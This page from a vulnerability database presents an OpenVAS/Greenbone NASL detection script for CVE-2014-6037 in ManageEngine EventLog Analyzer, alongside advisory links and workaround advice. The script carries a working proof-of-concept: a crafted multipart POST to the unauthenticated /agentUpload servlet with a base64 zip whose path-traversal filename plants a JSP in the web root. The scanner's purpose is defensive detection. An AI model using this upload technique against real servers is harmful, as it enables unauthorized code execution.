| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| ManageEngine EventLog Analyzer Multiple Vulnerabilities | 1 Sep 201400:00 | – | zdt | |
| ManageEngine Eventlog Analyzer Arbitrary File Upload Exploit | 12 Sep 201400:00 | – | zdt | |
| CVE-2014-6037 | 15 Sep 201400:00 | – | circl | |
| ManageEngine EventLog Analyzer agentUpload Directory Traversal (CVE-2014-6037) | 28 Sep 201400:00 | – | checkpoint_advisories | |
| CVE-2014-6037 | 26 Oct 201419:00 | – | cve | |
| CVE-2014-6037 | 26 Oct 201419:00 | – | cvelist | |
| ManageEngine EventLog Analyzer 9.9 File Upload | 1 Sep 201400:00 | – | dsquare | |
| ManageEngine Eventlog Analyzer - Arbitrary File Upload (Metasploit) | 15 Sep 201400:00 | – | exploitdb | |
| ManageEngine Eventlog Analyzer Arbitrary File Upload | 1 Sep 201406:56 | – | metasploit | |
| CVE-2014-6037 | 26 Oct 201419:55 | – | nvd |
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/bid/69482 |
| mogwaisecurity | www.mogwaisecurity.de/advisories/MSA-2014-01.txt |
| manageengine | www.manageengine.com/products/eventlog/ |
# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:zohocorp:manageengine_eventlog_analyzer";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.105083");
script_cve_id("CVE-2014-6037");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_version("2026-04-22T06:16:44+0000");
script_tag(name:"solution_type", value:"VendorFix");
script_name("ManageEngine EventLog Analyzer Multiple Security Vulnerabilities");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/69482");
script_xref(name:"URL", value:"http://www.manageengine.com/products/eventlog/");
script_xref(name:"URL", value:"https://www.mogwaisecurity.de/advisories/MSA-2014-01.txt");
script_tag(name:"impact", value:"Attackers can exploit these issues to execute arbitrary code and gain
unauthorized access to the critical sections of the application.");
script_tag(name:"vuldetect", value:"Upload a special crafted zip file and check if /openvas.jsp exist afterwards and contains an expected string.");
script_tag(name:"insight", value:"1)Unauthenticated remote code execution
ME EventLog Analyzer contains a 'agentUpload' servlet which is used by Agents
to send log data as zip files to the central server. Files can be uploaded
without authentication and are stored/decompressed in the 'data' subdirectory.
As the decompress procedure is handling the file names in the ZIP file in a
insecure way it is possible to store files in the web root of server. This can
be used to upload/execute code with the rights of the application server.
2) Authorization issues
The EventLog Analyzer web interface does not check if an authenticated has
sufficient permissions to access certain parts of the application. A low
privileged user (for example guest) can therefore access critical sections of the web
interface, by directly calling the corresponding URLs. This can be used to access the
database browser of the application which gives the attacker full access to the database.");
script_tag(name:"solution", value:"Ask the Vendor for an update. Workaround:
1) Unauthenticated remote code execution
If agents are not used to collect log information, access to the servlet can be disabled by commenting out the
following lines in the web.xml file (webapps/event/WEB-INF/web.xml) and restart the service.
<servlet>
<servlet-name>agentUpload</servlet-name>
<servlet-class>com.adventnet.sa.agent.UploadHandlerServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>agentUpload</servlet-name>
<url-pattern>/agentUpload</url-pattern>
</servlet-mapping>
2) Authorization issues
No workaround, reduce the attack surface by disabling unused low privileged accounts like 'guest'.");
script_tag(name:"summary", value:"ManageEngine EventLog Analyzer is prone to an arbitrary file-upload
vulnerability and an unauthorized-access vulnerability.");
script_tag(name:"affected", value:"EventLog Analyzer 9.9 Build 9002 and prior are vulnerable.");
script_tag(name:"last_modification", value:"2026-04-22 06:16:44 +0000 (Wed, 22 Apr 2026)");
script_tag(name:"creation_date", value:"2014-09-09 12:16:43 +0200 (Tue, 09 Sep 2014)");
script_category(ACT_ATTACK);
script_family("Web application abuses");
script_copyright("Copyright (C) 2014 Greenbone AG");
script_dependencies("gb_manageengine_eventlog_analyzer_http_detect.nasl");
script_mandatory_keys("manageengine/eventlog_analyzer/http/detected");
script_require_ports("Services/www", 8400);
script_tag(name:"qod_type", value:"remote_app");
exit(0);
}
include("host_details.inc");
include("misc_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
if (!port = get_app_port(cpe: CPE, service: "www"))
exit(0);
if (!get_app_location(cpe: CPE, port: port, nofork: TRUE))
exit(0);
useragent = http_get_user_agent();
host = http_host_name(port: port);
function _send( data )
{
if( ! data ) return;
data = base64_decode( str:data );
ex = '\r\n' +
'------------------------------d781b0329289\r\n' +
'Content-Disposition: form-data; name="payload"; filename="evil.zip"\r\n' +
'Content-Type: application/octet-stream\r\n' +
'\r\n' +
data +
'\r\n' +
'------------------------------d781b0329289--';
len = strlen( ex );
req = 'POST /agentUpload HTTP/1.1\r\n' +
'User-Agent: ' + useragent + '\r\n' +
'Host: ' + host + '\r\n' +
'Accept: */*\r\n' +
'Content-Length: ' + len + '\r\n' +
'Expect: 100-continue\r\n' +
'Content-Type: multipart/form-data; boundary=----------------------------d781b0329289\r\n' +
ex;
result = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );
if( ! result ) return;
return result;
}
# evil.zip -> openvas.jsp -> <%= new String("OpenVAS RCE Test") %>
zip = 'UEsDBBQAAAAAADZcKUVt2hsLJgAAACYAAAAfAAAALi4vLi4vd2ViYXBwcy9ldmVudC9vcGVudmFzLmpzcDwlP' +
'SBuZXcgU3RyaW5nKCJPcGVuVkFTIFJDRSBUZXN0IikgJT4KUEsBAhQDFAAAAAAANlwpRW3aGwsmAAAAJgAAAB' +
'8AAAAAAAAAAAAAAKSBAAAAAC4uLy4uL3dlYmFwcHMvZXZlbnQvb3BlbnZhcy5qc3BQSwUGAAAAAAEAAQBNAAA' +
'AYwAAAAAA';
# evil.zip -> openvas.jsp -> -
zip_clean = 'UEsDBBQAAAAAAFpdKUWQvFEqKgAAACoAAAAfAAAALi4vLi4vd2ViYXBwcy9ldmVudC9vcGVudmFz' +
'LmpzcDwlPSBuZXcgU3RyaW5nKCJPcGVuVkFTIFRFU1QgRk9SIFJDRSIpICU+ClBLAwQUAAAAAACN' +
'ZSlFDqEmgQIAAAACAAAAHwAAAC4uLy4uL3dlYmFwcHMvZXZlbnQvb3BlbnZhcy5qc3AtClBLAQIU' +
'AxQAAAAAAFpdKUWQvFEqKgAAACoAAAAfAAAAAAAAAAAAAACkgQAAAAAuLi8uLi93ZWJhcHBzL2V2' +
'ZW50L29wZW52YXMuanNwUEsBAhQDFAAAAAAAjWUpRQ6hJoECAAAAAgAAAB8AAAAAAAAAAAAAAKSB' +
'ZwAAAC4uLy4uL3dlYmFwcHMvZXZlbnQvb3BlbnZhcy5qc3BQSwUGAAAAAAIAAgCaAAAApgAAAAAA';
buf = _send( data:zip );
if( isnull( buf ) ) exit( 99 );
url = "/openvas.jsp";
req = http_get( item:url, port:port );
buf = http_send_recv( port:port, data:req, bodyonly:FALSE );
if( "OpenVAS RCE Test" >< buf )
{
report = 'By uploading a special crafted zip file, the file "/openvas.jsp" was created. Please delete this file.';
security_message( port:port, data:report );
_send( data:zip_clean );
exit( 0 );
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation